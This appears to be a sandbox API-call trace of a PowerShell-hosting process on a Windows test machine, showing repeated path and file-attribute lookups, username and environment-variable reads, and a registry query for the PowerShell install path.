	[0218.727] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xbcfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.727] SetErrorMode (uMode=0x1) returned 0x1
	[0218.727] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0218.727] SetErrorMode (uMode=0x1) returned 0x1
	[0218.727] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xbcfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.727] SetErrorMode (uMode=0x1) returned 0x1
	[0218.727] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0218.727] SetErrorMode (uMode=0x1) returned 0x1
	[0218.727] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xbcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.727] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xbced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.727] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xbcfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.727] SetErrorMode (uMode=0x1) returned 0x1
	[0218.727] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.727] SetErrorMode (uMode=0x1) returned 0x1
	[0218.728] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xbcfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.728] SetErrorMode (uMode=0x1) returned 0x1
	[0218.728] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.728] SetErrorMode (uMode=0x1) returned 0x1
	[0218.728] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xbcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.728] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0xbced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.728] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.728] SetErrorMode (uMode=0x1) returned 0x1
	[0218.728] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.728] SetErrorMode (uMode=0x1) returned 0x1
	[0218.728] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.728] SetErrorMode (uMode=0x1) returned 0x1
	[0218.728] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.729] SetErrorMode (uMode=0x1) returned 0x1
	[0218.729] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.740] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0xbced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.763] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbd240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.763] SetErrorMode (uMode=0x1) returned 0x1
	[0219.764] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xbd4a0 | out: lpFileInformation=0xbd4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.764] SetErrorMode (uMode=0x1) returned 0x1
	[0220.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.656] CoTaskMemAlloc (cb=0x804) returned 0x1b796b80
	[0225.656] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b796b80, nSize=0xbd808 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd808) returned 0x1
	[0225.657] CoTaskMemFree (pv=0x1b796b80) 
	[0225.657] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0225.657] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd848 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd848) returned 1
	[0225.657] CoTaskMemFree (pv=0x32d910) 
	[0225.658] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9d868*="Available", lpRawData=0x2e9d5f8) returned 1
	[0225.916] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0225.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.916] CoTaskMemFree (pv=0x2e4100) 
	[0225.917] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0225.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.918] CoTaskMemFree (pv=0x2e4100) 
	[0225.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.958] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0225.958] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0225.958] CoTaskMemFree (pv=0x2e4100) 
	[0225.958] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0225.958] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0225.959] CoTaskMemFree (pv=0x2e4100) 
	[0225.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.960] GetCurrentProcessId () returned 0x86c
	[0225.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.964] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd828 | out: phkResult=0xbd828*=0x358) returned 0x0
	[0225.965] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd7ac, lpData=0x0, lpcbData=0xbd7a8*=0x0 | out: lpType=0xbd7ac*=0x1, lpData=0x0, lpcbData=0xbd7a8*=0x56) returned 0x0
	[0225.965] CoTaskMemAlloc (cb=0x5a) returned 0x1b76fa10
	[0225.965] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd77c, lpData=0x1b76fa10, lpcbData=0xbd778*=0x56 | out: lpType=0xbd77c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xbd778*=0x56) returned 0x0
	[0225.965] CoTaskMemFree (pv=0x1b76fa10) 
	[0225.965] RegCloseKey (hKey=0x358) returned 0x0
	[0225.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.820] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0227.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.820] CoTaskMemFree (pv=0x2e4100) 
	[0227.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
